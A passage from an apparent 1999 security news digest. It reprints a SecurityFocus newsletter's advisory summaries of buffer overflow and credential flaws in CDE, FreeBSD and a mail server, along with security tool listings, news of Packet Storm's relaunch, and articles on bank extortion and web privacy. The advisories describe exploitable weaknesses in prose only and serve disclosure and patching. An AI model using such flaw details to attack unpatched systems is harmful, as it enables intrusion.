There is a buffer overflow in the FuseMail POP service (long USER,PASS)
that may allow an intruder to execute arbitrary code on the target server.
7. Multiple Vendor CDE dtaction Userflag Buffer Overflow Vulnerability
BUGTRAQ ID: 635
Remote: No
Date Published: 1999-09-13
Relevant URL:
http://www.securityfocus.com/bid/635
Summary:
Under some distributions of CDE Common Desktop Environment, the dtaction
program has a locally exploitable buffer overflow condition. dtaction is a
program which allows applications or shell scripts that otherwise are not
connected into the CDE development environment, to request that CDE
actions be performed. The buffer overflow condition exists in the argument
parsing code for the -u (user) function. Any information provided by the
user over 1024 bytes may overwrite the buffer and in return be exploited
by a malicious user.
8. Multiple Vendor CDE dtspcd Vulnerability
BUGTRAQ ID: 636
Remote: No
Date Published: 1999-09-13
Relevant URL:
http://www.securityfocus.com/bid/636
Summary:
This explanation is quoted from the initial post on this problem by Job De
Hass. This message is available in it's entirety in the 'Credit' section
of this vulnerability entry.
The CDE subprocess daemon /usr/dt/bin/dtspcd contains an insufficient
check on client credentials. The CDE subprocess daemon allows
cross-platform invocation of applications. In order to authenticate the
remote user, the daemon generates a filename which is to be created by the
client and then is verified by the daemon. When verifying the created
file, the daemon uses stat() instead of lstat() and is subsequently
vulnerable to a symlink attack. Further more the daemon seems to allow
empty usernames and then reverts to a publicly write-able directory
(/var/dt/tmp).
9. Multiple Vendor CDE ttsession Vulnerability
BUGTRAQ ID: 637
Remote: Yes
Date Published: 1999-09-13
Relevant URL:
http://www.securityfocus.com/bid/637
Summary:
Under some versions of CDE the ToolTalk session daemon ttsession does not
properly check client credentials. The insufficient credentials check can
lead to compromise of a system from both local and remote with the
credentials of the user running ttsession. Note that ttsession is not a
system daemon and may not be running all the time. It is normally started
as part of an X-session. Also client programs of ttsession may restart the
daemon if it can not be found running.
This explanation is quoted from the initial post on this problem by Job
De Hass. This message is available in it's entirety in the 'Credit'
section of this vulnerability entry.
10. Multiple Vendor CDE TT_SESSION Buffer Overflow Vulnerability
BUGTRAQ ID: 641
Remote: No
Date Published: 1999-09-13
Relevant BUGTRAQ:
http://www.securityfocus.com/bid/641
Summary:
The libtt.so shared library under certain versions of CDE handles a user
defined variable titled TT_SESSION. The code which handles this variable
does not place a restriction on it's size. At least one of the CDE
programs which rely on this variable do not have sufficient bounds
checking in place for this variable, this can result in a buffer overflow.
The program in question is dtsession. Due to the fact that dtsession is
running setuid root and does not remove the root privilege (at least as
tested on Solaris), the overflow can lead to local root compromise.
11. FreeBSD fts Library Buffer Overflow Vulnerability
BUGTRAQ ID: 644
Remote: No
Date Published: 1999-09-16
Relevant URL:
http://www.securityfocus.com/bid/644
Summary:
Within Libc and in particular in the fts library functions a buffer
overflow exists in certain FreeBSD installations. The fts routines are
used by programs which need to traverse the files system of the host. Any
series of startup scripts which do work within the file system may use
fts. However, this particular overflow is related to the security checking
scripts. The fts library functions had a buffer overflow in them where
which would lead to a core dump when periodic ran the security checking
scripts (or other scripts which traverse trees that can be controlled by
users). periodic(3) should limit core size to zero to disable core dumps
while it is executing commands, but does not do so. In addition, the
kernel should not follow symbolic links. All three of these problems
caused a situation where it was possible for an attacker could create or
overwrite an arbitrary file on the system with a moderate degree of
control of its contents to cause a problem. The vast majority of this
description was taken from the FreeBSD Advisory FreeBSD-SA-99:05 which is
available in it's entirety in the 'credits' section of this vulnerability
entry.
III. PATCH UPDATES 1999-09-11 to 1999-09-19
-------------------------------------------
This newsletter is somewhat spare on available patch information, however
if you follow the URL's provided for the BUGTRAQ vulnerability issues you
will find that most include patch information. Below is another update
from ProFTPD.
1. Vendor: ProFTP
Product: Proftpd
Patch Locations:
http://www.proftpd.org
ftp://ftp.tos.net/pub/proftpd
Vulnerability Patched: ProFTPD Remote Buffer Overflow
Bugtraq ID: 612
Relevant URL:
http://www.securityfocus.com/bid/612/
IV. INCIDENTS SUMMARY 1999-09-11 to 1999-09-19
-----------------------------------------------
1. Stray FIN packets...
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-08-29&msg=199908302049.PAA06229@duckdog.zweknu.org
V. VULN-DEV RESEARCH LIST SUMMARY 1999-09-11 to 1999-09-19
----------------------------------------------------------
1. Guestbook perl script (long) (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-09-8&msg=37DDF0E3.EBE5ABFE@thievco.com
2. VULN-DEV Administrivia #2143
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-09-1&msg=37D1A8D3.9D30DCFB@thievco.com
3. Administrivia #2685
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-09-15&msg=37E14BFD.ED7E08E5@thievco.com
4. [Fwd: your guestbook]
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-09-15&msg=37E13807.74F7C4D2@thievco.com
VI. SECURITY JOBS 1999-09-11 to 1999-09-19
-------------------------------------------
Seeking Position:
1. Contact: M Simkin <msimkin@primenet.com>
Qualifications:
http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-09-8&msg=199909150422.VAA218782@smtp05.primenet.com
Date Posted: 09/14/99
Seeking Staff:
1. Nokia: SE Position Routing/Firewall/VPN
Reply to: Edward Gibbs <ed@iprg.nokia.com>
Position Requirements:
http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-09-8&msg=19990913183626.14399.qmail@securityfocus.com
2. System Administrator - Unix - New York City
Reply to: Gould, Beau <beau@nyc-search.com>
Position Requirements:
http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-09-8&msg=37DEC88D.75F7FBC0@nyc-search.com
3. Chief Security Officer #406
Reply to: Lori Sabat <lori@altaassociates.com>
Position Requirements:
http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-09-15&msg=19990915145111.25367.qmail@securityfocus.com
4. Computer Systems Programmer
Reply to: Gould, Beau <beau@nyc-search.com>
Position Requirements:
http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-09-15&msg=37E06D54.ED7B3D3E@nyc-search.com
5. Information Security Analyst
Reply to: Security Technology <security_technology@bigfoot.com>
Position Requirements:
http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-09-15&msg=3.0.6.32.19990915172736.007bb2e0@mail.netzero.net
6. Information Security Engineer
Reply to: Security Technology <security_technology@bigfoot.com>
Position Requirements:
http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-09-15&msg=3.0.6.32.19990915172640.007ba440@mail.netzero.net
7. Project Manager for the Information Security Group
Reply to: Security Technology <security_technology@bigfoot.com>
Position Requirements:
http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-09-15&msg=3.0.6.32.19990915172533.007dbd40@mail.netzero.net
VII. SECURITY SURVEY
--------------------
The question for 1999-09-11 to 1999-09-19 was:
How adequate do you think your incident response and disaster recovery
procedures are?
The answers were:
16% / 10 votes Excellent -- we have defined our risks and are aware of what we need to do
33% / 20 votes OK -- we know what to do, even though it's not documented
33% / 20 votes Poor -- we have the basic ideas, we'll figure the rest out if anything ever happens
16% / 10 votes Pathetic -- we are dead if a single host gets compromised
VIII. SECURITY FOCUS EVENTS for 1999-08-29 to 1999-09-04
--------------------------------------------------------
1. New Features In Tools Section
Relevant URL:
http://www.securityfocus.com/templates/announcement.html?id=31
The tools section has been updated, and now offers two major new features.
Tools can now be sorted by platform, which will greatly streamline the
process of finding a tool that works for you. Also, if you have found or
written a tool that you think we should have, you can submit it to the
website through your browser.
IX. SECURITY FOCUS TOP 6 TOOLS
---------------------------------
1. Stack Shield 0.5 beta
by vendicator@usa.net
Relevant URL: http://www.angelfire.com/sk/stackshield
The new Stack Shield 0.5 beta has been released. It has the capability to
set the buffer size and the entry point. It can also exit on attacks and
disable the protection system when too much calls are executed.
2. rinetd (for Win9x/NT)
by Thomas Boutell <boutell@boutell.com>
Relevant URL: http://www.boutell.com/rinetd/
Redirects TCP connections from one IP address and port to another. rinetd
is a single-process server which handles any number of connections to the
address/port pairs specified in the rinetd.conf file. Since rinetd runs as
a single process using nonblocking I/O, it is able to redirect a large
number of connections without a severe impact on the machine. This makes
it practical to run TCP services on machines inside an IP masquerading
Firewall. Persistent connection. Source code included.
3. rinetd (for Unix)
by Thomas Boutell <boutell@boutell.com>
Relevant URL: http://www.securityfocus.com/data/tools/rinetd_tar.tar
Redirects TCP connections from one IP address and port to another. rinetd
is a single-process server which handles any number of connections to the
address/port pairs specified in the file /etc/rinetd.conf. Since rinetd
runs as a single process using nonblocking I/O, it is able to redirect a
large number of connections without a severe impact on the machine. This
makes it practical to run TCP services on machines inside an IP
masquerading Firewall.
4. Subotronic
by Robin Keir <robin@keir.net>
Relevant URL: http://www.securityfocus.com/data/tools/subotronic.zip
A visual traceroute and Whois program.
5. ShoWin
by Robin Keir <robin@keir.net>
Relevant URL: http://www.securityfocus.com/data/tools/showin.zip
Displays useful information about windows by dragging a cursor over them.
It will also display the hidden password editbox fields (text behind the
asterisks *****) and can enable windows that have been disabled and unhide
hidden windows.
6. Boping
by Robin Keir <robin@keir.net>
Relevant URL: http://www.securityfocus.com/data/tools/boping.zip
A scanner for the infamous Back Orifice program. This is many times faster
than the ping sweeper built in to the original client program. I have
included the ability to notify detected victims by sending them a BO
messagebox message directly from within the program. This is intended as a
vigilante tool to notify victims who unknowingly have the trojan on their
system.
X. SPONSOR INFORMATION - Tripwire Security
------------------------------------------
URL: http://www.tripwiresecurity.com/
This Newsletter was sponsored by Tripwire Security. Tripwire Security
Systems, Inc. (TSS) is a Portland-based software development company
specializing in system security and policy compliance applications. The
company is developing a family of Defense in Depth(SM) security solutions
based on its Tripwirefile integrity assessment technology. Tripwire's file
integrity assessment technology is the most fundamental component of any
Intrusion Detection system. Tripwire monitors all servers and clients on a
network, detecting and reporting any changes to critical system or data
files. Tripwire can absolutely, unequivocally determine if a protected
file has been altered in a way that violates the policy set by the
administrator. This ensures that any change, whether due to an external
intruder or internal misuse, will be identified and documented on a timely
basis. After an intrusion has been detected, Tripwire enables the system
administrator to quickly identify which systems have been compromised,
allowing the organization to get back to business.
Alfred Huger
VP of Operations
Security Focus
@HWA
08.0 PSS: Packet Storm Security comes "back" online
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Its back, minus Ken Williams, he is still listed on the contacts page but is no
longer actively involved in the production of the web site. The site can be
reached at http://packetstorm.securify.com PSS was aquired by Kroll O'Gara and
Securify when Ken was forced to shut down his site at Harvard under false
allegations and what can only be termed a smear campaign by JP (John Vranesvich)
of AntiOnline.com (http://www.antionline.com)
The site presents a reasonable interface and reports from the general public are
so far good regarding response from the people running the site. The site was
swamped within hours of its opening with 700,000 hits in the first 12 hrs and
nearly 1.2 million hits in 24 hrs. We hope they have sturdy servers. :)
Contacts for Packetstorm:
~~~~~~~~~~~~~~~~~~~~~~~~
Contacts
For secure communications, please use PGP. PGP keys and fingerprints are here.
matt@packetstorm.securify.com Matt Barrie - C in C
silvertn@packetstorm.securify.com Michael Silverton - Chief Propaganda Officer und Spammeister
jkwilli2@unity.ncsu.edu Ken Williams - C in C (retired: personal mail - no longer at Packet Storm)
dcdc@packetstorm.securify.com Dean Clayton Digital Creations - Graphic Design
webmaster@packetstorm.securify.com Web Master
submissions@packetstorm.securify.com File and news submissions and updates
help@packetstorm.securify.com Help?
security@packetstorm.securify.com Site security, emergencies
support@packetstorm.securify.com Support
comments@packetstorm.securify.com Got a comment?
abuse@packetstorm.securify.com REAL complaints handled here
exploits@packetstorm.securify.com Questions and comments about exploits and vulnerabilities
crypto@packetstorm.securify.com Crypto and stego questions and comments
admin@packetstorm.securify.com System Administrator
devnull@packetstorm.securify.com 98% of the mail winds up here
geekgirl@packetstorm.securify.com Geek Girl
bugboy@packetstorm.securify.com Bug Boy
cerberus@packetstorm.securify.com Packet Storm Slave
media@packetstorm.securify.com All press, media, interview requests
Press release:
~~~~~~~~~~~~~~
Wednesday September 22, 7:01 am Eastern Time
Company Press Release
SOURCE: Kroll-O'Gara Information Security Group
Kroll-O'Gara ISG Launches Packet Storm, the World's Largest Internet
Security Resource
PALO ALTO, Calif., Sept. 22 /PRNewswire/ -- Packet Storm, the world's largest Internet security resource, opened its Web site to the public today. A service of the
Kroll-O'Gara Information Security Group (ISG), Packet Storm is a massive repository of tools, advisories, patches, and solutions, consisting of over 45,000 security
related items. Packet Storm is recognized as the leading security destination on the net, averaging over 300,000 hits per day. Packet Storm is located at
http://packetstorm.securify.com .
Regular users of Packet Storm include international and domestic corporations, leading information technology companies, government, and law enforcement agencies.
Business and government IT managers consider Packet Storm the premier site for obtaining up-to-date information on the latest threats that face computer networks
and information systems.
``The goal of enterprise information protection is to identify and select appropriate safeguards to protect physical and financial resources, intellectual property,
employees, and other tangible and intangible assets. Therefore, it is imperative to stay up to date with the latest vulnerability data,'' stated Dr. Taher Elgamal, president of
Kroll-O'Gara ISG.
Packet Storm has a well-established reputation within the information security community as the best site for obtaining the latest security resources available on the net.
The site includes instant-access search filters for identifying up-to-the-minute updates and tools which enable IT managers to quickly find the solutions they need.
``Any company that builds enterprise-wide or e-commerce networks, that wishes to protect their existing networks, or has just been hacked, should come to Packet
Storm,'' said Matt Barrie, Packet Storm Program Manager.
Packet Storm is the world's largest Internet security resource, employing the industry standard Apache Web server with Network Flight Recorder, the most popular
intrusion detection and monitoring system, all running on FreeBSD, renowned for its superior network performance, security, and robustness. Packet Storm is at
http://packetstorm.securify.com .
About Kroll-O'Gara ISG, a subsidiary of the Kroll-O'Gara Company
(Nasdaq: KROG - news)
The Kroll-O'Gara Information Security Group is composed of highly regarded
industry experts that provide objective information security services to
businesses and government agencies. Services include network security review
and repair, product assessment, design and implementation of secure
architectures for e-commerce sites. Kroll-O'Gara ISG is unique in the
security field because it not only provides assessments and recommendations,
but also manages implementation and deployment. For information, visit their
Web site at www.kroll-ogara.com.
About the Kroll-O'Gara Company
The Kroll-O'Gara Company (KROG) is a leading global provider of a broad range of specialized products and services designed to supply solutions to a variety of
security needs. Kroll-O'Gara provides governments, businesses and individuals with information, analysis, training, advice and products to mitigate the growing risks
associated with fraud, electronic threats, physical threats and uninformed decisions based upon incomplete or inaccurate information. The Company is organized into
three primary business groups: Investigations & Intelligence Group, Security Products & Services Group and Information Security Group. Kroll-O'Gara employs more
than 2,600 people in over 60 offices and plants around the world. For information, visit their Web site at www.kroll-ogara.com.
SOURCE: Kroll-O'Gara Information Security Group
FreshMeat announcement:
~~~~~~~~~~~~~~~~~~~~~~
Packet Storm back online
scoop - September 23rd 1999, 19:12 EST
After being shut down on July 1st due to a lawsuit threat to Harvard University, the Packet Storm Internet Security
Resource is back online. Packet Storm (which has been acquired by Securify aka Kroll-O'Gara in the meantime)
provides users with up-to-date information on the latest threats that face corporate networks and computer
systems.
Kroll-O'Gara ISG launches Packet Storm, the world's largest Internet Security Resource
PALO ALTO, Calif., September 21, 1999 Packet Storm, the world's largest Internet security resource, opened its
web site to the public today. A service of the Kroll-O'Gara Information Security Group (ISG), Packet Storm is a
massive repository of tools, advisories, patches, and solutions, consisting of over 45,000 security related items.
Packet Storm is recognized as the leading security destination on the net, averaging over 300,000 hits per day.
Packet Storm is located at packetstorm.securify.com.
Regular users of Packet Storm include international and domestic corporations, leading information technology
companies, government, and law enforcement agencies. Business and government IT managers consider Packet
Storm the premier site for obtaining up-to-date information on the latest threats that face computer networks and
information systems.
"The goal of enterprise information protection is to identify and select appropriate safeguards to protect physical
and financial resources, intellectual property, employees, and other tangible and intangible assets. Therefore, it is
imperative to stay up to date with the latest vulnerability data," stated Dr. Taher Elgamal, president of
Kroll-O'Gara ISG.
Packet Storm has a well-established reputation within the information security community as the best site for
obtaining the latest security resources available on the net. The site includes instant-access search filters for
identifying up-to-the-minute updates and tools which enable IT managers to quickly find the solutions they need.
"Any company that builds enterprise-wide or e-commerce networks, that wishes to protect their existing networks,
or has just been hacked, should come to Packet Storm," said Matt Barrie, Packet Storm Program Manager.
Packet Storm is the world's largest Internet security resource, employing the industry standard Apache web server
with Network Flight Recorder, the most popular intrusion detection and monitoring system, all running on FreeBSD,
renowned for its superior network performance, security, and robustness. Packet Storm is at
packetstorm.securify.com
About Kroll-O'Gara ISG, a subsidiary of the Kroll-O'Gara Company (KROG)
The Kroll-O'Gara Information Security Group is composed of highly regarded industry experts that provide objective
information security services to businesses and government agencies. Services include network security review and
repair, product assessment, design and implementation of secure architectures for e-commerce sites. Kroll-O'Gara
ISG is unique in the security field because it not only provides assessments and recommendations, but also
manages implementation and deployment. For information, visit their web site at www.kroll-ogara.com.
About the Kroll-O'Gara Company
The Kroll-O'Gara Company (KROG) is a leading global provider of a broad range of specialized products and services
designed to supply solutions to a variety of security needs. Kroll-O'Gara provides governments, businesses and
individuals with information, analysis, training, advice and products to mitigate the growing risks associated with
fraud, electronic threats, physical threats and uninformed decisions based upon incomplete or inaccurate
information.
The Company is organized into three primary business groups: Investigations & Intelligence Group, Security
Products & Services Group and Information Security Group. Kroll-O'Gara employs more than 2,600 people in over 60
offices and plants around the world. For information, visit their web site at www.kroll-ogara.com.
Q & A with Packetstorm maintainer Matt Barrie
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Q & A with Packetstorm maintainer Matt Barrie
By xix on September 11th, 1999
Matt Barrie has taken over the reigns of the Packetstorm security archives. The archive is the
largest freeware security archive on the net and was taken down and displaced due to legal issues
between the hacker site Antionline and the former maintainer/owner of Packetstorm Ken Williams.
Please give us some background information about you Matt.
Currently I am the maintainer of Packet Storm, though it still hasn't been determined whether not I
will continue to be long term. We're rapidly growing the Packet Storm team, so who knows what
things will look like in a few months.
To tell you a few things about myself, I run the Network & Systems Assessment Practice Area,
which is part of the consulting group at Kroll-O'Gara ISG; in that group we do things like Penetration
Testing, Incident Response, Physical Security, and obviously, Network Assessment. My clients are
mostly Fortune 500-type companies and are from all over the world.
Before this for a couple of years I ran a company doing similar things in Australia, called Infilsec Pty.
Limited.
Are all the archives of former Packetstorm intact?
Almost entirely. We have, as part of a general cleanup of the site, removed an insignificant amount
of information that didn't really fit in with the site's focus on Information Security.
There may be one or two sections, though, which may not be ready in time for the site launch,
such as the massive cryptography archive. Naturally, we need to make sure that we've taken all
the proper steps to ensure that we're doing everything by the book.
What new features will we see from the new site?
The site will retain the same focus and vision that Ken Williams had when he was maintaining it;
only it will be bigger & better. We're overhauling the site, touching it up a little and making it a bit
simpler to navigate and use. We'll be using Apache running on FreeBSD in our web farm, and will be
watching all the interesting things that'll be going on with NFR and a couple more toys we have
here. Of course, this will all be an on-going thing. We're also streamlining some of its operation.
Tell us about Kroll-O'Gara and their involvement.
Packet Storm is part of the Information Security Group at Kroll-O'Gara. Kroll-O'Gara is the world's
leading risk mitigation company (NASDAQ:KROG). Kroll-O'Gara is divided into three groups; Risk
Control Services (RCS), who do everything from forensic accounting, business & investigations
intelligence, to asset tracing and surveillance; the Security Products and Services Group (SPSG)
who do, amongst other things, armouring of commercial and military vehicles; and the Information
Security Group (ISG) - us. We provide information security services related to Network Architecture
& Design, e-Commerce, Policy, Product Assessment, PKI, a
nd Network & Systems Assessment.
Can we expect Packetstorm to continue to be the largest security archive on the net?
Definately! Ken found that as the site grew, it got to the point that he was running out of hours in
the week. Even forgoing food and sleep, there's only 168. With the resources & staffing we're
committing to the site, we'll be able to maintain Packet Storm as #1 for security resources.
We've recommended that Ken take a well earned rest, go jump in that Camaro SS and go on a
holiday to a remote beach somewhere and try to get a tan that isn't generate by electron beams.
Of course, knowing Ken he's still working :)
What do you think of the SecurityFocus.com website and what they have done?
I think they've got an excellent site, and it's great to see more places starting up devoted to
Information Security. With Bugtraq now being run from there, with its explosive growth in
readership, SecurityFocus is going to be fostering a first rate security community.
I have noticed over the years that many more exploits and fixes are found for *nix based
operating systems, what would you say the percentage of Packetstorm archives consist
of...more for nix system or more for window systems?
Just because more vulnerabilities are found in a particular operating system doesn't mean that it's
worse. In fact- far from the case. More bugs tend to be reported for UNIX because of the mostly
open nature of its source, full-disclosure mailing lists, and so on. This all helps to make UNIX an
extremely stable and well-written platform. With the source code to Windows being proprietary, and
Microsoft not being exactly willing to expose Window's internal workings, it makes it that much
harder for the security community to find and help fix bugs. As a result, who knows what the true
qualitative difference is between the two platforms with respect to bugs. A couple of years ago
there was all this talk about "Is UNIX dead?" with NT out and having relatively few bugs being
reported. But now people have started reverse engineering the internals of the operating system
and I'm amazed by some of the sorts of crazy things that are being found.
How do you feel about Redhat's success, do you think it will fragment the Linux community?
I think any success for Linux in entering the mainstream is a good thing. It's about time we had
cheap, industrial strength OS alternatives. Now that the more traditional vendors are putting their
support behind companies like RedHat; investing in them, shipping their Linux distributions out of the
box, and so on, it has really become accepted as a serious alternative to using Windows or more
expensive distributions of UNIX.
Do you expect to see a lot of problems submitted from the upcoming Windows2000
operating system?
What do you think? :)
Will you continue to carry directories about AntiOnline and HappyHappy hacker
information?
Well I suspect you're trolling about that one. We understand that in the past that Ken and
AntiOnline etc. have had their differences. As new owners of the site we don't wish to partake in
any of this. If they provide useful information about Information Security, we'd be more than happy
to add it to our archive.
Will there be an elaborate web page front end for the new Packetstorm or strictly similiar to
the older one focusing on the archives only?
You'll have to wait and see :)
We plan on having the site up September 22, if all goes to plan with the co-location facility.
Thanks for the opportunity to talk to you about Packet Storm. We're determined to maintain it as
the world's largest resource for Internet Security Solutions. Of course, this would be impossible
without the valuable support of the security community; hackers, engineers, programmers, vendors,
admins and geeks alike!
"Windows 95: 32-bit extensions and a graphical shell for a 16-bit patch to an 8-bit operating system originally coded
for a 4-bit microprocessor, written by a 2-bit company that can't stand for 1 bit of competition." - Unknown
Got shares yet??
~~~~~~~~~~~~~~~~
Stock of the Day
Sep 10, 1999
Kroll-O'Gara: Bullets Fly, But the Shares Should Come Back to Life
by Bob Hirschfeld 9/10/99
Back in 1997, Jules Kroll and Thomas O'Gara decided to join forces.
Kroll had a great deal of admiration for O'Gara's armored limousine business. And O'Gara thought highly of Kroll's lucrative business
of providing security for corporate executives.
Since then, the combined entity, Kroll-O'Gara (NASDAQ:KROG - news) has posted heady growth in sales and profits. In its most recent quarter alone, sales rose by
29% to $76.5 million, fueling a 43% jump in profits, to $5.3 million. A 6% increase in gross margins gets the credit for the outsized profit gain.
Investors, though, have not been too enamored with the union. For shares of Kroll-O'Gara fell nearly 60% to $17.50, before recovering somewhat to a recent $22.94.
Rumors of a power struggle between O'Gara and Kroll have led some to conclude that the company is headed for a break-up.
Hogwash, says Warburg Dillon Read's Tom O'Halloran. He says that no dispute currently exists between the leaders and the shares have been penalized unfairly.
As time passes, and the management team remains intact, investors should refocus their sights on the company's strong growth prospects, much of which is fueled by a
spate of recent acquisitions. The company has added 17 security-related companies over the past two years, and five this year alone.
Those deals have helped the company flesh out its product lines in its two main divisions: Investigations & Intelligence (which comprised 60% of second quarter
revenue), and Security Products & Services (38%) and principally known for its armored vehicles).
Continuing its acquisition skein, on June 3, the company spent $20 million to buy Buchler Phillips, a U.K. firm that helps financially troubled companies to restructure.
The purchase represents an extension of Kroll-O'Gara's risk-management business to financial services. The thinking here is that companies beset by fraud may be
headed toward bankruptcy. If so, they require the kinds of restructuring services offered by Buchler Phillips, which helps companies restructure following "these kinds of
incidents," according to O'Gara.
In a more recent acquisition, Kroll purchased Packet Storm Security, a company that provides users with computer security threat information and offers an Internet site
that will help customers obtain information to ensure that their networks are secure. The acquisition builds upon earlier computer security services acquisitions, and
expands the company's Internet presence.
O'Halloran, in analyzing the second quarter, applauded the strong revenue growth of 26%, which exceeded his 21% estimate, though he was a bit concerned that
operating expenses fetched a larger share of revenue than they did a year ago.
The analyst kept unchanged his 1999 and 2000 per-share estimates of $1.17 and $1.55. However, he expects third and fourth quarter growth rates to improve, given
new Investigation & Intelligence businesses, new government contracts, and lower selling, general and administrative expenses as a percent of revenue.
Of note is the fact that the company's military products (such as its up-armored HumVee, which has seen duty in Bosnia), enjoy a backlog of roughly $27 million. With
commercial backlog at about $20 million, at least 25% of second half revenue can be considered secure.
O' Halloran notes that shares currently trade at about 12 times his 2000 earnings estimate, less than half the projected growth rate. O'Halloran forecasts EPS to increase
50% in 1999 and 32% in 2000.
The analyst claims that, given the company's growth record, shares deserve a 25 multiple.
Bottom Line:
Using the analyst's 2000 forecast of $1.55, that establishes a target of $39 on shares, a 70% premium to current share prices.
@HWA
09.0 British Banks Suffer Blackmail Attempts
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by dis-crete
The London Times reports that British banks are being
blackmailed by "hackers" who have penetrated
computers. It reported that ransoms of hundreds of
thousands of pounds have been demanded from several
different banks. It is hard to weed out the verifiable
facts from the rumor and innuendo in this article. It
would seem that blackmail threats are rather common in
the EU but the article doesn't seem to mention if these
were more than just threats.
The Sunday London Times
http://www.the-times.co.uk/news/pages/sti/99/09/19/stinwenws01021.html?999
Hackers hold City banks to
ransom
Jon Ungoed-Thomas and Maeve Sheehan
BRITISH banks are being blackmailed by hackers who
penetrate their security systems and threaten to cripple their
computers or publish stolen files, a Sunday Times investigation
has found.
Ransoms of hundreds of thousands of pounds are being
demanded by the hackers and one European bank has
admitted it was a victim of the racket. City investigators say at
least two London financial institutions have paid out ransoms
totalling more than £1m.
The blackmail threats underline the dangers posed by
criminals who "crack" computer security systems. GCHQ, the
government's electronic surveillance centre in Cheltenham, is
so concerned by the threat that it is to help key companies
safeguard themselves.
About 30 international banks have admitted serious security
attacks on their networks last year. Trading, accounting and
communication departments are among those that have been
"ransacked" at a cost of more than £5m.
One German bank, Noris Verbraucherbank, was targeted by a
hacker who claimed he had raided customer accounts and
stolen bank access codes. Executives offered a reward for his
capture in January last year after he demanded a £300,000
ransom.
City investigators claim the case is not an isolated one. "There
have been a number of cases in the UK where hackers have
threatened to shut down the trading floors in financial
institutions," said Mark Rasch, a former attorney for computer
crime at the United States justice department. "The three I
know of [in London] happened in the space of three months
last year one after the other." Rasch now works as a legal
counsel for Global Integrity, a computer security company.
"There was the same pattern - a high ransom for millions was
initially demanded, but then it started to come down. In one
case, the trading floor was shut down and a ransom paid." In
another incident last year, an extortionist threatened to publish
the stolen client database of a London financial institution
unless he was paid a £1m ransom.
Executives called in private investigators, but settled the
ransom rather than risk confidential company information
being published on the internet.
A survey by Global Integrity of 50 of the world's largest banks
has revealed that more than half suffered one significant
network attack last year. While the most adept hackers - such
as Vladimir Levin, the Russian graduate who transferred more
than £6m from Citibank in New York after logging on the
network from a laptop in Moscow - will seek to steal funds, it
is easier to steal information or disable systems.
Corrupt employees are responsible for the vast majority of
extortion attempts, but external hackers regularly probe bank
security systems. The International Chamber of Commerce
(ICC), which is shortly to launch a dedicated cyber crime unit
to advise members on the threat, last week confirmed it had
received several reports of attempted extortion but was unable
to release any figures. It is one of several computer crime
issues that will be addressed at an ICC conference on cyber
crime in December.
"We have had cases of extortion and the matter has been
investigated internally and the threat removed," said Pottengal
Mukundan, director of commercial crime services at ICC. "I
don't think you will find there are many companies which
admit to having a problem."
Edward Wilding, director of computer forensics at Maxima
Group, said his firm investigates about four cases of attempted
cyber extortion a year for multinationals and financial
institutions. "Computer extortion is not rife, but we do get
called to assist in incidents where extortionists have attempted
to extract money by the use of encryption and where
databases of sensitive information have been stolen," he said.
Companies which are worried about hackers can get advice
from the Communications Electronics Security Group, a
branch of GCHQ. From next month, it is offering to inspect
sensitive computer systems of key companies.
Additional reporting: Jessica Berry
@HWA
10.0 You Have No Privacy On The Net
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
As HNN's privacy statement says in its title;
"You have zero privacy anyway, Get over it."
From HNN http://www.hackernews.com
contributed by Weld Pond
A new report recently released by Forrester Research,
Inc., claims that 90 percent of Web sites fail to comply
with basic privacy principles. This reports is 180 degree
turn from what the FTC has told congress, that industry
self-policing is working.
E Commerce Times
http://www.ecommercetimes.com/news/articles/990916-3.shtml
Forrester Research, Inc
http://www.forrester.com/
HNN Privacy Statement - Read It and Judge for Yourself
http://www.hackernews.com/misc/privacy.html
E Commerce Times;
Report Labels Internet Privacy
Policies 'A Joke'
By Chet Dembeck
E-Commerce Times
September 16, 1999
According to a new report from Forrester Research, Inc., 90
percent of Web sites fail to comply with basic privacy principles.
The report vehemently contradicts the findings of the Federal
Trade Commission, which recently told Congress that industry
self-policing is working.
Forrester feels that "most privacy policies are a joke." It added that the vast
majority of such policies, like those of the Gap, Macy's and JC Penney, use vague
terms and legalese that serve to protect companies and not individuals.
Few Follow Fair Information Guidelines
In addition, the report finds that just 10 percent of e-commerce sites adequately
address the basic fair information guidelines that were established by the
government and industry to protect privacy. The recent security breach of
Microsoft's Hotmail and the unintended profile usage in Amazon.com's "Purchase
Circles" underscore the problem.
Third-party Privacy Programs Not Being Used
Seal programs such as TRUSTe and BBBOnline have gained little traction, the report
says. Truste has only 500 licensees and BBBOnline, which provides consumer
complaint resolutions, has only 42.
Forrester adds that while e-tailers barely comply with weak privacy policies, new
technology is enabling them to "collect, dissect and use even more personal
visitor-behavioral data."
Interactive Tools Become Digital Wiretappers
According the report, clever interactive tools such as Reel.com's Mood Matcher --
which helps customers find movies based on their moods -- and PlanetRx's
personalized prescription filler make it possible for companies to collect "highly
intrusive psychographic data that individuals would rarely provide on a standard
registration form."
In addition, Forrester said that there is growing industry pressure to share such
data with "partners." It reports that DoubleClick and BEFree already provide services
such as advertising networks and affiliate programs across multiple sites. The report
also indicates that there is an alarming trend among e-tailers to incorporate artificial
intelligence tools into their storefronts -- the same kind of tools used by
government intelligence communities to covertly gather information.
Recommends FTC Take A Stronger Stand
Forrester concludes that without forceful action by the FTC, the privacy issue could
easily spin out of control and hobble consumer e-commerce. The report suggests
that the FTC, rather than pumping out reassuring messages to the industry, take
the following steps:
o Sound the warning signal early. Rather than burying its head in the sand, the
FTC should be pushing companies to take bigger and faster strides toward
